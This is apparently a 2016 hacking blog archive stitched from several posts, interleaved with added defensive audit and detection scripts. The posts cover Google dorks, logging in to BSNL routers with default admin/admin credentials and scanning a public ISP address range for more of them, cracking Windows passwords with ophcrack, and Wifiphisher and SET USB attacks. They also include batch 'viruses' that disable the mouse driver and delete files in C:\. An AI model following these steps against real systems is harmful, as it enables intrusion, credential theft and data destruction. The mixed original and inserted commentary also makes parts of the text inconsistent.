Friday, July 8, 2016

Understanding Google Dorks and How Hackers Use Them

The idea of using Google as a hacking tool or platform certainly isn't novel; hackers have been leveraging this incredibly popular search engine for years. In fact, Google Dorks have their roots in 2002, when Johnny Long started using custom queries to search for elements of certain websites that he could leverage in an attack (his collection of queries became the Google Hacking Database). At its core, that's exactly what Google Dorks are: a way to use the search engine to pinpoint websites that have certain flaws, vulnerabilities and sensitive information that can be taken advantage of. As a side note, some people refer to Google Dorks as Google Hacking (the terms are more or less synonymous).
Believe it or not, Google Dorks can uncover some incredible information such as email addresses and lists, login credentials, sensitive files, website vulnerabilities and even financial information (e.g. payment card data). In fact, in our WordPress hacking tutorial we listed a few Google Dorks that could be used to find SQLi (SQL injection) vulnerabilities. And the wonderful thing, from the attacker's point of view, is that this is an incredibly passive form of reconnaissance: the queries go to Google, not to the target, so the target's servers never see them and nothing draws attention to the hacker. Unfortunately, some people use these techniques for illicit and nefarious activities such as cyberwarfare, digital terrorism, identity theft and a whole host of other undesirable activities.
If you are reading this to learn how to break into a website and harm others just for kicks, perhaps you should pursue other interests. Let me caution you by stating that breaking into websites is an illegal activity, and it violates not only laws but moral codes as well. If you get caught, the consequences could be dire. Then why learn this to begin with, you ask? Well, the first place any white hat hacker needs to start is with understanding how hackers operate. Only then can they plug the security holes to prevent future attacks.
Understanding Google Dorks Operators
Just like arithmetic, programming languages and other formal notations, Google search has operators that an aspiring white hat hacker needs to understand. There are far too many to include in this guide, but we will go over the most common. Mind the syntax: the operator is followed immediately by a colon and its value, with no space in between (intitle:"login page" works as an operator; intitle: "login page" is read as an ordinary search for the words).
  • intitle – searches for pages with the given text in their HTML <title>. intitle:"login page" helps a hacker scour the web for login pages.
  • allintitle – like intitle, but every word of the query must appear in the title.
  • inurl – searches for pages whose URL contains the given text (e.g. inurl:login.php).
  • allinurl – like inurl, but every word must appear in the URL.
  • filetype – narrows search results to a specific type of file such as PHP, PDF or TXT (filetype:pdf).
  • ext – an alias of filetype; Google treats the two identically, and both match on the file extension.
  • intext – searches the body text of pages for the keywords supplied by the hacker.
  • allintext – like intext, but the page must contain all of the given keywords.
  • site – limits the scope of a query to a single domain and its subdomains (site:example.com); a bare TLD such as site:gov also works.
Custom Crafting Google Dork Queries
Now that we have a basic understanding of the operators and of how Google Dorks can be used to scour the web, it's time to look at query syntax. At a high level, a dork that targets a specific domain has two parts: one operator that fixes the scope, and one or more operators that describe what to look for inside that scope:
  • site:domain additional-operators
A hacker would simply fill in the parts as follows:
  • site: = the scope operator. inurl:domain/ can be used instead, as older guides do, but it matches any URL that merely contains that string, so site: is the cleaner choice.
  • domain = the domain of the site being examined, e.g. example.com
  • additional-operators = the sub-fields and parameters the hacker wants to scan for, e.g. inurl:admin, ext:sql or intitle:"index of"
If a hacker wishes to search by a field other than the URL, any of the following operators can be substituted (note that Google has retired several of these over the years, phonebook:, link: and info: among them, so check that an operator still works before building queries on it):
  • intitle:
    inurl:
    intext:
    define:
    site:
    phonebook:
    maps:
    book:
    info:
    movie:
    weather:
    related:
    link:
These options will help a hacker uncover a lot of information about a site that isn't readily apparent without a Google Dork. They also offer ways to scan the web to locate hard-to-find content. The following is an example of a Google Dork:
Making Effective Use of Operators
It may seem a little cryptic at first, so here are a few examples of how the different operators can be used to locate content and website data. The intitle operator is the workhorse for finding open directory listings: intitle:"index of" matches the default title that Apache and nginx give a directory with no index page, so intitle:"index of" "backup" or intitle:"index of" ext:sql surfaces files that were never meant to be linked. Someone scraping email addresses combines operators the same way, for example site:example.com intext:"@example.com".
Furthermore, the intext operator can be used to scan the body of individual pages for any text you want, such as a target's email address, name, the name of a web page (like a login screen) or other personal information, to collect data about them.
The more you practice, the further you'll be able to hone your queries to pinpoint different types of websites, pages and vulnerabilities. Again, I need to caution you not to use these queries to attack another website, because that would be illegal and could get you into a lot of trouble. Still, Google Dorks are a great way to locate exposed information on the web, which is why hackers love to use them to find security flaws in websites, and why site owners should run the same queries against their own domains before someone else does.
If you want to dig into some more queries, there are some great Google Dork resources on the web.
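The defender's version of the same technique, as an added example that is not part of the original post: instead of querying Google, walk your own web root and flag the files the classic dorks surface (database dumps, backup copies, .env files, logs, phpinfo pages, directories with no index page), printing the site-scoped dork that would find each one. The web root, file names and contents below are constructed for the demonstration; the domain example.com and the regex list are assumptions, not anything the post specifies.

```python
"""Offline self-audit for Google-dork exposure.

Walks a web root the way a crawler would, flags files that the classic dorks
surface and reports the site-scoped dork that would find each one.
"""
import os
import re
import shutil
import tempfile

# (issue, regex on the path relative to the web root, dork template)
CHECKS = [
    ("SQL dump",         r"\.sql(\.gz)?$",              "site:{site} ext:sql"),
    ("backup copy",      r"\.(bak|old|orig|save|swp)$", "site:{site} ext:bak OR ext:old"),
    ("environment file", r"(^|/)\.env$",                "site:{site} inurl:.env"),
    ("log file",         r"\.log$",                     "site:{site} ext:log"),
    ("phpinfo page",     r"(^|/)phpinfo\.php$",         "site:{site} inurl:phpinfo.php"),
]
# Crude credential sniff on the first 64 KiB of a flagged file
CRED_RE = re.compile(rb"(?i)(password|passwd|pwd|secret|api[_-]?key)\s*[=:]\s*\S+")


def audit(webroot: str, site: str) -> list:
    """Return one finding per exposed file or index-less directory."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        # No index.* means the web server may emit an "Index of /..." listing
        if not any(f.lower().startswith("index.") for f in filenames):
            dork = f'site:{site} intitle:"index of"' + (f" inurl:{rel_dir}" if rel_dir else "")
            findings.append({"path": rel_dir or "/", "issue": "directory listing (no index page)",
                             "dork": dork, "credentials": False})
        for name in filenames:
            rel = f"{rel_dir}/{name}" if rel_dir else name
            for issue, pattern, dork in CHECKS:
                if re.search(pattern, rel):
                    with open(os.path.join(dirpath, name), "rb") as fh:
                        head = fh.read(64 * 1024)
                    findings.append({"path": rel, "issue": issue, "dork": dork.format(site=site),
                                     "credentials": bool(CRED_RE.search(head))})
                    break  # one finding per file
    return findings


def demo(site: str = "example.com") -> list:
    """Build a constructed web root (not a real site) and audit it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.html": b"<html>ok</html>",
        "wp-config.php.bak": b"<?php $db_password = 'hunter2';",
        "backup/site.sql": b"INSERT INTO users VALUES ('admin', 'password: s3cret');",
        "logs/app.log": b"2016-07-08 login ok user=admin",
        ".env": b"API_KEY=abc123\nDEBUG=true\n",
        "phpinfo.php": b"<?php phpinfo();",
    }
    try:
        for rel, content in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        return audit(root, site)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in demo():
        flag = " [credentials?]" if f["credentials"] else ""
        print(f'{f["path"]:<22} {f["issue"]:<36} {f["dork"]}{flag}')
```

Point it at a real document root with audit("/var/www/html", "yourdomain.example") and fix what it lists; the dork column is the query to run afterwards to confirm Google has not already indexed the file.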

Hacking BSNL Broadband Routers Tutorial by Binary Dad

Note: this walkthrough was done on the ADSL/ADSL2+ routers that BSNL shipped to its broadband customers around 2012; other models differ in detail, but the approach is the same.
In this article we are going to log in to the router itself to learn more about it. That small and innocent-looking modem is actually a little Linux computer. Let's get into it. First, run an nmap scan of the modem from inside the LAN. Here is a quick example:
$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-31 19:52 IST
Nmap scan report for 192.168.1.1
Host is up (0.052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
5431/tcp open  park-agent

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
The http port is open, which is why the administration page is reachable at http://192.168.1.1/
But apart from http, the telnet port is also open. So why not try connecting to it?
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
SemIndia Systems ADSL Router
Login: admin
Password: 
>
 
Wow! We are able to log in to the router's telnet daemon using the default username/password of admin/admin. (This is the first thing to change on your own router: the same default credentials work for anyone who can reach the telnet port.)
What next? Type the help command and hit Enter. It will list the supported commands, somewhat like this:
> help

?
help
logout
reboot
adsl
atm
brctl
cat
df
dumpcfg
echo
ifconfig
kill
arp
defaultgateway
dhcpserver
dns
lan
passwd
ppp
remoteaccess
restoredefault
route
save
swversion
wan
serialnum
lan6
dhcp6c
dns6
defaultgateway6
route6
ping
ps
pwd
sntp
sysinfo
tftp

>
Some of these are the common terminal commands on Linux: ps, pwd, ping, cat and so on. So let's see the current working directory using pwd.
> pwd
/
>

Listing directories

So we are in the root directory of the filesystem. The ls command is not available, so we have to use another trick to list the directory: the shell's own globbing. echo * prints every name the glob expands to.
> echo *
bin dev etc images lib linuxrc mnt proc sbin usr var webs
>
Cool! Those are the same top-level directories found on any Linux system such as Ubuntu or Fedora.

/etc/passwd file

You might next want to see the password file /etc/passwd. The cat command is available and can be used for this.
> cat /etc/passwd
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
>
That's a Linux password file, and it tells us a lot. Every account, nobody included, has UID 0, so logging in as any of them gives full root. The password fields are traditional 13-character DES crypt hashes (two-character salt, password truncated to eight characters), which are cheap to brute-force offline, and they sit in /etc/passwd rather than a shadow file, so anyone who can read this file can attack all four accounts.
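As an added example (not from the original post), here is a small audit of a passwd file in this format, run over the four lines printed above. It classifies the hash scheme from the password field, flags UID 0 under a non-root name, legacy DES crypt, empty passwords and service accounts that have an interactive shell. The service-account name list is an assumption chosen for the demonstration.

```python
"""Audit a BusyBox-style /etc/passwd for the weaknesses seen on this router."""
import re

# The four lines printed by `cat /etc/passwd` on the router above
ROUTER_PASSWD = """\
admin:7wfiFif6nh6VA:0:0:Administrator:/:/bin/sh
support:MVMCoQ0jGR4Yo:0:0:Technical Support:/:/bin/sh
user:MrYImHrIkIxRI:0:0:Normal User:/:/bin/sh
nobody:685CCPc3VWsbs:0:0:nobody for ftp:/:/bin/sh
"""

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")   # 2-char salt + 11-char hash
PREFIXES = {"$1$": "MD5-crypt", "$2": "bcrypt", "$5$": "SHA-256-crypt", "$6$": "SHA-512-crypt"}
SERVICE_NAMES = {"nobody", "ftp", "daemon", "www-data"}   # assumed list for the demo


def hash_kind(field: str) -> str:
    """Classify the password field so weak schemes can be flagged."""
    if field == "":
        return "empty"
    if field in ("x", "*", "!", "!!"):
        return "shadowed/locked"
    for prefix, name in PREFIXES.items():
        if field.startswith(prefix):
            return name
    if DES_CRYPT.match(field):
        return "DES-crypt"
    return "unknown"


def audit_passwd(text: str) -> list:
    """One finding per entry: user, uid, hash scheme, shell and a list of issues."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append({"user": line, "uid": None, "hash": "malformed",
                             "shell": "", "issues": ["malformed entry"]})
            continue
        name, pw, uid, _gid, _gecos, _home, shell = parts
        kind = hash_kind(pw)
        issues = []
        if uid == "0" and name != "root":
            issues.append("UID 0: logging in as this user gives full root")
        if kind == "DES-crypt":
            issues.append("DES-crypt: password truncated to 8 chars, cheap to brute-force")
        if kind == "empty":
            issues.append("no password set")
        if name in SERVICE_NAMES and shell.endswith("sh"):
            issues.append("service account with an interactive shell")
        findings.append({"user": name, "uid": int(uid) if uid.isdigit() else None,
                         "hash": kind, "shell": shell, "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_passwd(ROUTER_PASSWD):
        print(f"{f['user']:<8} uid={f['uid']} {f['hash']:<10} " + "; ".join(f["issues"]))
```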

Linux version

The uname command is not available, so to get the Linux kernel version and other details, use the following command:
> cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Wed Dec 16 08:35:56 IST 2009
>
So that shows the linux kernel version and some extra details.

Better shell

The above shell can be improved by running the sh command.
> sh


BusyBox v1.00 (2009.12.16-03:08+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#
So now we get a BusyBox shell. Once again we can type the help command to see what all is available.
# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        cp date dmesg echo expr false ftpget ifconfig init insmod kill
        killall klogd linuxrc ln logger logread mkdir mount msh ping
        ps pwd reboot rm rmmod route sendarp sh sleep sysinfo syslogd
        test tftp tftpd true tty umount vconfig

#
This time we have a few additional commands available, like cd, mkdir, date, eval, exec and even mount and insmod.
A list of all the commands BusyBox can be built with is available in the BusyBox documentation at http://www.busybox.net/downloads/BusyBox.html.

CPU/RAM Information

The details about CPU and architecture can be found out using the following command
# cat /proc/cpuinfo
system type             : 96338L-2M-8M
processor               : 0
cpu model               : BCM6338 V1.0
BogoMIPS                : 239.20
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : no
unaligned access                : 1289794
VCED exceptions         : not available
VCEI exceptions         : not available
#
It's a 32-bit MIPS processor, a Broadcom BCM6338 SoC. You can compile C programs for this platform with a MIPS cross-compiler; these routers typically ship a uClibc-based userland, so either build against a matching toolchain or link statically, and mind the endianness. Check http://developer.mips.com/tools/compilers/ for more information. Also check http://people.debian.org/~debacle/cross/.
RAM information
# cat /proc/meminfo
MemTotal:         5688 kB
MemFree:           424 kB
Buffers:           128 kB
Cached:           1004 kB
SwapCached:          0 kB
Active:           2016 kB
Inactive:          356 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:         5688 kB
LowFree:           424 kB
SwapTotal:           0 kB
SwapFree:            0 kB
Dirty:               0 kB
Writeback:           0 kB
Mapped:           1764 kB
Slab:             2284 kB
Committed_AS:     5172 kB
PageTables:        300 kB
VmallocTotal:  1048560 kB
VmallocUsed:       120 kB
VmallocChunk:  1048400 kB
#

So the kernel sees about 5.5 MB of RAM (MemTotal 5688 kB; the board name 96338L-2M-8M in /proc/cpuinfo suggests 2 MB of flash and 8 MB of RAM, with the remainder presumably reserved), and only a few hundred kilobytes of it are free. Anything you upload has to be small.
There are many other files in the /proc directory that can be viewed to gather more information about the system.
# cd proc
# echo *
1 10 123 17 191 2 274 275 276 290 3 378 395 4 43 49 5 548 549 6 611 612 7 8 9 accumem buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems free_pagewalk fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net nvram pagewalk partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
#
Try viewing other files and see what comes up.

Get Current username

The whoami command is not available, so the shell's variables have to be used to find the current username, home directory and so on. These are just environment variables set at login, not an authoritative answer; /etc/passwd above already showed that admin is UID 0.
# echo $USER
root
# echo $HOME
/
# echo $PATH
/bin:/sbin:/usr/bin
#

Writing files

The /var directory is writable (on firmware like this it is usually RAM-backed, so anything written there disappears on reboot). Files have to be created with the echo command, since there is no editor.
# echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" >> /var/happy.txt
# cat /var/happy.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ
#
Remote files can be downloaded onto the router as well. The ftpget command is available for this; the exact syntax can be found at http://www.busybox.net/downloads/BusyBox.html.
With ftpget, chmod and insmod all present, you could write and cross-compile a C program (or a kernel module for this exact 2.6.8.1 kernel) for the MIPS target and upload it to the router; keep it small given the free memory shown above.

Hacking remote routers

You can discover remote routers with a simple nmap command like this
$ sudo nmap --open -sS -sV -T4 117.194.233.1/24 -p 80 -oG - | grep 'open'
# Nmap 5.21 scan initiated Sat Sep  1 11:53:58 2012 as: nmap --open -sS -sV -T4 -p 80 -oG - 117.194.233.1/24 
Host: 117.194.233.4 ()  Ports: 80/open/tcp/////
Host: 117.194.233.12 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.35 () Ports: 80/open/tcp//http//D-Link DSL-502T http config/
Host: 117.194.233.40 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.42 () Ports: 80/open/tcp//http//Embedded Allegro RomPager webserver 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 117.194.233.57 () Ports: 80/open/tcp//http//thttpd/
Host: 117.194.233.61 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.68 () Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.72 () Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.77 () Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.104 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 117.194.233.106 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.138 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.141 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.145 ()        Ports: 80/open/tcp//http//SonicWALL firewall http config/
Host: 117.194.233.150 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.158 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 117.194.233.160 ()        Ports: 80/open/tcp//http//Linksys wireless-G WAP http config (Name DSL-N10)/
Host: 117.194.233.217 ()        Ports: 80/open/tcp//skype2//Skype/
Host: 117.194.233.227 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.19/
This command scans one /24 of BSNL's address space to see which hosts are alive with port 80 open and, thanks to -sV, what web server they identify as. micro_httpd most likely means a SemIndia router with the BusyBox shell seen above. "Embedded Allegro RomPager" are the Binatone and Beetel modems (also sold by Airtel) that BSNL broadband users have. Note that the scan only looked at port 80; telnet (23) on the same hosts is what the rest of this article relies on, so add -p 23,80 to see both. Port-scanning address ranges you do not own or have permission to test is not something to do from home.
One way to irritate other users is to restart a remote router by issuing the reboot command in the telnet session. But that would not be much fun.

Hack into the LAN

The arp command can be used on the router to list the hosts on its LAN, i.e. all the computers in its internal network. It's quite simple:
> arp show

IP address       HW type     Flags       HW address            Mask     Device
192.168.1.216    0x1         0x2         ##:##:##:##:##:##     *        br0
192.168.1.33     0x1         0x2         ##:##:##:##:##:##     *        br0

>
The hardware (MAC) addresses have been hidden for privacy. The router is now telling us who is inside its network.
Note that the arp command is not available in the sh (BusyBox) shell; it belongs to the router's own telnet CLI, so run it there.

Any of the internal nodes can be pinged 
> ping 192.168.1.216
PING 192.168.1.216 (192.168.1.216): 56 data bytes
56 bytes from 192.168.1.216: icmp_seq=0 ttl=128 time=60.0 ms
56 bytes from 192.168.1.216: icmp_seq=1 ttl=128 time=80.0 ms
56 bytes from 192.168.1.216: icmp_seq=2 ttl=128 time=0.0 ms
56 bytes from 192.168.1.216: icmp_seq=3 ttl=128 time=30.0 ms

--- 192.168.1.216 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.0/42.5/80.0 ms
>
From here on it might be possible to do some more advanced hacking. The insmod command is available and can be used to load kernel modules, which would have to be cross-compiled for this exact 2.6.8.1 MIPS kernel.
Hackers would like to make a remote router forward a copy of all network traffic to their own machine so that information can be stolen. Note that iptables is not in the BusyBox command list above, so on this firmware that would mean uploading a suitable binary or kernel module with ftpget first; nothing in the stock command set mirrors traffic.

Conclusion

It would be a good idea to protect your own router from such attempts from the internet. Change the default admin/admin password, then disable remote (WAN-side) access to telnet, http and any other management service: log in to your configuration page and find out how to do that, and if the firmware offers no such setting, block those ports on the WAN interface or replace the device.
This technique is not only applicable to BSNL routers. Other ISPs such as Airtel also use similar routers, so the same thing may work on them as well; only the IP range differs.
The rest is up to your creativity. Research and find out what else can be done on such routers.

Thursday, July 7, 2016

Windows 7 Hack With Ophcrack


In this tutorial I will show you how to recover a Windows 7 password using the free open-source tool ophcrack. The same method works on Windows XP and Windows Vista. So let's get started.

What Is Ophcrack ?

Ophcrack is an open-source Windows password cracker based on rainbow tables. It comes with a graphical user interface (GUI) and runs on multiple platforms (Windows, Linux and Mac). Booted from its LiveCD it reads the local SAM database and tries to recover the account passwords from their hashes.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download the ophcrack LiveCD image for the platform you want to recover:
  • Windows 7 or Windows Vista: ophcrack Vista/7 LiveCD.
  • Windows XP: ophcrack XP LiveCD.
  2. Burn the live image to the CD.
  3. Insert the disc into the drive and restart the computer (set the BIOS to boot from the optical drive first if it does not).
  4. If everything goes right you will see the ophcrack boot menu.
  5. Wait for ophcrack to boot automatically, or press Enter to advance.
  6. Several lines of boot messages will scroll by, possibly too fast to read (you don't need to worry about that).
  7. The ophcrack window then opens and lists the local accounts, for example Administrator and Guest. Notice the word "empty" next to an account: it means the account has no password, so if the account is enabled you could log in without one.
  8. The tables shipped on the free LiveCD only cover short, simple passwords, so ophcrack will often NOT crack the password. It does, however, show the NT hash of every account.
  9. Copy the value under the NT Hash column.
  10. Navigate to http://crackstation.net/, which is an online hash lookup service.
  11. Paste in the hash value you copied in step 9, enter the captcha and click on Crack Hashes. This works because the NT hash is an unsalted MD4 of the password, so a precomputed table of common passwords can be looked up directly; a long random password will not be in any table. None of this works if the disk is encrypted: full-disk encryption (BitLocker) plus a firmware boot-order lock is the defence, since ophcrack needs to read the SAM from an unencrypted disk.


Binary Virus For Format Hardisk

This post claims you can make a hard-disk-formatting virus by pasting a string of binary digits into Notepad and saving it as Format.exe, and that you can send it to a friend or enemy to format their disk. It does not work, and it is worth understanding why: a text file containing the characters 0 and 1 is just ASCII text, renaming it to .exe does not turn it into machine code, and Windows refuses to run it because the file has no valid PE (MZ) header. The "virus" below formats nothing.

 1. Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
2. Save the file as Format.exe
 3. Double-clicking the file produces an error that it is not a valid application. Nothing else happens.

Amazing Batch File

How To Disable Mouse

  1. Open Notepad and copy the code below
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


  2. Save this file as virus.bat
  3. Done, you just created your "virus". What it actually does: it deletes the Mouclass service key from the registry and recreates it with Start=4 (disabled), so after the next reboot the mouse class driver is not loaded. Two caveats: it only works from an elevated (Administrator) command prompt, and reg delete without /f stops to ask for confirmation. To undo it, set Start back to its original value (1 on a default install) or restore the key from a backup; the keyboard still works, so the machine is not locked out.

Learn to make Dangerous Virus in couple of Minute


What will this virus do? It tries to delete every file in the root of the C: drive.

 1. Open Notepad and copy the code below into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (the name can be anything, but the .bat extension is a must)
   3. Running this file deletes the files in the root of the C: drive: not subdirectories, and not files that are in use or protected by ACLs. Two things to note about the code as written: the stray space makes C:\ and *.* two separate targets (the root of C: and the current directory), and the |y on the end is not the confirmation the author intended. del with a wildcard prompts "Are you sure?", and piping del's output into a command called y answers nothing, so the script stops at that prompt rather than answering it.
Warning: Please don't run this on your own computer or you will lose the contents of your C: drive root. I will not be responsible for any damage done to your computer.


Wednesday, July 6, 2016

A new Wi-Fi attack tool has been released called Wifiphisher.
The attack is a twist on old tricks: a man-in-the-middle plus a phishing page.

It works by selecting a target access point and deauthenticating its clients, which pushes them onto a rogue access point you run under the same network name instead of their real router.

Once connected, they are shown a fake router page that asks for the Wi-Fi (WPA) password, on the pretext of a router firmware upgrade.
After they enter the password it is displayed on your screen. Once you have the password, they are allowed to reconnect to their real router and move on.
The project describes the attack in the following steps.

 From the victim's perspective, the attack takes place in three phases:
1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's Wi-Fi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.

2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.

3. Victim is being served a realistic router config-looking page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks for WPA password confirmation due to a router firmware upgrade.

 It runs on Kali Linux and needs two wireless cards: one that the victim can connect to and another to kick their connection with the deauth command, which requires a Kali Linux-compatible adapter. I chose a TP-Link wireless USB adapter, which is available on Flipkart.

This is a tool that I am going to play with on my test routers and see how well it works.

To install wifiphisher, open a terminal window and enter the following command.
git clone https://github.com/kalimkhan/Wifi-Phisher


Download Wifi Phisher : https://www.facebook.com/groups/maskmaster.pk/10153243260163123/
To run it, change into the cloned directory (git clone names it after the repository) and start the script:
cd Wifi-Phisher
sudo python ./wifiphisher.py

Here is the Github home page for wifiphisher. https://github.com/kalimkhan/Wifi-Phisher
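Both halves of the attack described above are visible on the air, so here is the detection side as an added example (not part of the original post or of the Wifiphisher project): a deauthentication flood from a spoofed BSSID, and a second BSSID beaconing the victim's SSID (the evil twin). The frames are constructed in the script, so it runs offline; on a real monitor-mode capture you would strip the radiotap header before handing each frame to parse(). The threshold of 10 deauths per second and the MAC addresses are assumptions chosen for the demo. Deauth frames are unauthenticated in networks without 802.11w (Protected Management Frames), which is the actual fix for phase 1.

```python
"""Spot the two observable halves of a Wifiphisher-style attack in an 802.11 capture:
a deauthentication flood and a second BSSID beaconing the victim's SSID (evil twin).
Works on bare 802.11 frames; strip the radiotap header first on a real capture.
"""
import struct
from collections import Counter, defaultdict

MGMT, BEACON, DEAUTH = 0, 8, 12          # frame type 0 (management) and its subtypes


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def fmt(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


# --- frame builders, used only to construct the sample capture -------------------
def mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes, seq: int) -> bytes:
    fc = bytes([(subtype << 4) & 0xF0, 0x00])   # type 0, subtype in the high nibble, no flags
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body


def beacon(bssid: bytes, ssid: str, seq: int = 0) -> bytes:
    fixed = struct.pack("<QHH", 0, 100, 0x0411)  # timestamp, beacon interval, capabilities
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode()
    return mgmt_frame(BEACON, mac("ff:ff:ff:ff:ff:ff"), bssid, bssid, fixed + ssid_ie, seq)


def deauth(ap: bytes, client: bytes, reason: int = 7, seq: int = 0) -> bytes:
    return mgmt_frame(DEAUTH, client, ap, ap, struct.pack("<H", reason), seq)


# --- parser and detector ----------------------------------------------------------
def parse(raw: bytes):
    """(type, subtype, addr1, addr2, addr3, body) from a bare 802.11 frame."""
    ftype, subtype = (raw[0] >> 2) & 0x3, (raw[0] >> 4) & 0xF
    return ftype, subtype, raw[4:10], raw[10:16], raw[16:22], raw[24:]


def ssid_of(beacon_body: bytes):
    """Walk the information elements after the 12 fixed beacon bytes; element 0 is the SSID."""
    ies, i = beacon_body[12:], 0
    while i + 2 <= len(ies):
        eid, length = ies[i], ies[i + 1]
        if eid == 0:
            return ies[i + 2:i + 2 + length].decode(errors="replace")
        i += 2 + length
    return None


def analyse(capture, deauth_per_sec: int = 10) -> list:
    """capture: iterable of (timestamp_seconds, frame_bytes). Returns alert strings."""
    deauths = Counter()                 # (transmitter, whole second) -> count
    ssid_bssids = defaultdict(set)      # ssid -> BSSIDs seen beaconing it
    for t, raw in capture:
        ftype, subtype, _a1, a2, a3, body = parse(raw)
        if ftype != MGMT:
            continue
        if subtype == DEAUTH:
            deauths[(a2, int(t))] += 1
        elif subtype == BEACON:
            ssid = ssid_of(body)
            if ssid is not None:
                ssid_bssids[ssid].add(a3)
    alerts = []
    for (tx, sec), n in sorted(deauths.items()):
        if n >= deauth_per_sec:
            alerts.append(f"deauth flood: {n} deauths in second {sec} claiming to be AP {fmt(tx)}")
    for ssid, bssids in sorted(ssid_bssids.items()):
        if len(bssids) > 1:
            alerts.append(f"evil twin: SSID {ssid!r} beaconed by " + ", ".join(sorted(map(fmt, bssids))))
    return alerts


def constructed_capture() -> list:
    """A made-up capture: 3 normal beacons, a 30-frame deauth burst, then a rogue beacon."""
    real_ap, rogue_ap, client = mac("00:11:22:33:44:55"), mac("66:77:88:99:aa:bb"), mac("de:ad:be:ef:00:01")
    cap = [(i * 0.1, beacon(real_ap, "HomeWiFi", i)) for i in range(3)]
    cap += [(1.0 + i * 0.02, deauth(real_ap, client,  seq=i)) for i in range(30)]  # spoofed "from" the real AP
    cap.append((1.8, beacon(rogue_ap, "HomeWiFi")))
    return cap


if __name__ == "__main__":
    for alert in analyse(constructed_capture()):
        print(alert)
```

A wireless IDS does essentially this, plus a whitelist of the BSSIDs that are allowed to advertise each SSID so that a legitimate multi-AP network is not reported as an evil twin.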

How to Take Data From PC Using A USB


Security Test [ PC by Using A USB ]

Today we are going to get remote access to a PC with a malicious file created in BackTrack. All you then have to do is plug in the USB stick, wait a few seconds and unplug it; the victim PC connects back to you and you have control over it.
Don't abuse this trick. You are responsible for your actions.

What Do We Need ?

#Backtrack 5
#Vulnerable Software On Victim PC,(read below)
#Physical Access For 10 Seconds.
#Patience and Brains.


Creating The Malicious Batch File :

#Step 1 -

Open Backtrack,Go to The Social Engineering Toolkit by entering the below commands in Konsole :
cd /pentest/exploits/set
./set

#Step 2 -

Select the Social-Engineering Attacks by entering 1.

#Step 3 -

Select Infectious Media Generator by entering 3. This option creates an autorun.inf file plus a payload file that exploits the vulnerable software.

#Step 4 -

Select the 1st option. This lets you pick a specific piece of software to exploit.

